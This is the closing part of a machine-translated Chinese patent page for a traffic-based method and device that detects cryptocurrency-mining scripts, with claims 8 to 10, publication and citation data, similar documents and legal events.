8. The utility model provides a dig ore deposit script detection device based on flow which characterized in that includes:
the matching module is used for responding to the operation of generating a download script file by the flow data, and matching the preset threat intelligence data with the flow data to obtain a matching result;
the word determining module is used for determining a first word matched with a feature word set and a second word matched with a special word set in the script file through the ore mining identification model under the condition that the matching result is successful, wherein the feature word set is a word set with the occurrence frequency of which is greater than a first threshold value in an ore mining script sample, and the special word set is a word set which appears in the ore mining script sample and does not appear in a normal script sample;
the recognition module is used for determining whether the script file is a mine digging script or not according to the characteristic words and the special words;
and the alarm module is used for generating alarm information under the condition that the script file is the ore excavation script.
9. A flow-based ore excavation script detection apparatus, comprising:
a processor;
a memory for storing processor-executable instructions;
wherein the processor is configured to invoke the memory-stored instructions to perform the method of any of claims 1 to 7.
10. A computer-readable storage medium having computer program instructions stored thereon which, when executed by a processor, implement the method of any one of claims 1-7.
CN202310080142.2A 2023-02-08 2023-02-08 Flow-based mining script detection method and device Active CN115801466B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202310080142.2A CN115801466B (en) 2023-02-08 2023-02-08 Flow-based mining script detection method and device

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202310080142.2A CN115801466B (en) 2023-02-08 2023-02-08 Flow-based mining script detection method and device

Publications (2)

Publication Number Publication Date
CN115801466A true CN115801466A (en) 2023-03-14
CN115801466B CN115801466B (en) 2023-05-02

Family

ID=85430463

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202310080142.2A Active CN115801466B (en) 2023-02-08 2023-02-08 Flow-based mining script detection method and device

Country Status (1)

Country Link
CN (1) CN115801466B (en)

Citations (8)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN103544436A (en) * 2013-10-12 2014-01-29 深圳先进技术研究院 System and method for distinguishing phishing websites
CN104901962A (en) * 2015-05-28 2015-09-09 北京椒图科技有限公司 Method and device for detecting webpage attack data
CN108399337A (en) * 2018-03-16 2018-08-14 北京奇虎科技有限公司 Webpage digs the method and device of mine script for identification
CN110427755A (en) * 2018-10-16 2019-11-08 新华三信息安全技术有限公司 A kind of method and device identifying script file
CN110933060A (en) * 2019-11-22 2020-03-27 上海交通大学 Excavation Trojan detection system based on flow analysis
CN112087414A (en) * 2019-06-14 2020-12-15 北京奇虎科技有限公司 Detection method and device for mining trojans
CN113139189A (en) * 2021-04-29 2021-07-20 广州大学 Method, system and storage medium for identifying mining malicious software
CN115438340A (en) * 2022-08-31 2022-12-06 济南大学 Mining behavior identification method and system based on morpheme characteristics

Patent Citations (8)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN103544436A (en) * 2013-10-12 2014-01-29 深圳先进技术研究院 System and method for distinguishing phishing websites
CN104901962A (en) * 2015-05-28 2015-09-09 北京椒图科技有限公司 Method and device for detecting webpage attack data
CN108399337A (en) * 2018-03-16 2018-08-14 北京奇虎科技有限公司 Webpage digs the method and device of mine script for identification
CN110427755A (en) * 2018-10-16 2019-11-08 新华三信息安全技术有限公司 A kind of method and device identifying script file
CN112087414A (en) * 2019-06-14 2020-12-15 北京奇虎科技有限公司 Detection method and device for mining trojans
CN110933060A (en) * 2019-11-22 2020-03-27 上海交通大学 Excavation Trojan detection system based on flow analysis
CN113139189A (en) * 2021-04-29 2021-07-20 广州大学 Method, system and storage medium for identifying mining malicious software
CN115438340A (en) * 2022-08-31 2022-12-06 济南大学 Mining behavior identification method and system based on morpheme characteristics

Also Published As

Publication number Publication date
CN115801466B (en) 2023-05-02

Similar Documents

Publication Publication Date Title
CN108632081B (en) Network situation evaluation method, device and storage medium
TW202205151A (en) Network training method, target detection method, electronic device and computer readable storage medium
CN110633755A (en) Network training method, image processing method and device and electronic equipment
CN110990801B (en) Information verification method and device, electronic equipment and storage medium
CN109842612B (en) Log security analysis method and device based on graph library model and storage medium
CN110942036A (en) Person identification method and device, electronic equipment and storage medium
CN107659717B (en) State detection method, device and storage medium
CN105589623A (en) Notification message checking method, apparatus and terminal
CN114338083A (en) Controller local area network bus abnormality detection method and device and electronic equipment
CN110807393A (en) Early warning method and device based on video analysis, electronic equipment and storage medium
CN112328398A (en) Task processing method and device, electronic equipment and storage medium
TW202205127A (en) Target detection method, electronic equipment and computer-readable storage medium
CN116707965A (en) Threat detection method and device, storage medium and electronic equipment
CN113569992A (en) Abnormal data identification method and device, electronic equipment and storage medium
CN110826697A (en) Method and device for obtaining sample, electronic equipment and storage medium
CN111625671A (en) Data processing method and device, electronic equipment and storage medium
CN109992503B (en) Automatic testing method and device
CN115801466B (en) Flow-based mining script detection method and device
CN112953916B (en) Anomaly detection method and device
WO2023045185A1 (en) Object detection method and apparatus, electronic device and storage medium
CN110750448B (en) Test case generation method and device based on symbol execution
CN112131999B (en) Identity determination method and device, electronic equipment and storage medium
CN112083841B (en) Information input method, device and storage medium
CN115098196A (en) Verification method and device, electronic equipment and storage medium
CN113687925A (en) Equipment operation processing method and device, storage medium and computer equipment

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination
GR01 Patent grant
GR01 Patent grant